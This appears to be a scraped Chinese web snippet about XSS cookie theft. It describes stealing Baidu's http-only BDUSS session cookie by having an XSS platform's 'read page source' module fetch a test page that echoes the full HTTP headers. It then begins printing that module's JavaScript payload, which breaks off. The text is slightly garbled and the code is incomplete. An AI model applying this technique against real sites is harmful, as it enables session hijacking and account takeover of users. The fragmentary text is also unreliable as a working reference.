xss平台收到cookie

xss平台收到cookie（xss平台是干嘛的）

如何通过 XSS 获取受 http-only さcookie 该测试页返回了完整的http头，其中也包括了完整的cookie。混贴吧圈的应该都知道BDUSS是最关键的字段，同时该字段是受http-only保护的，百度SRC之前也因此下调了XSS的评分标准。02.jpg这样，我们只要利用XSS平台的"指定页面源码读取"模块即可通过XSS获取用户的完整cookie。该模块代码如下:code 区域var u = ';id={projectId}';var cr;if (document.charset) { cr...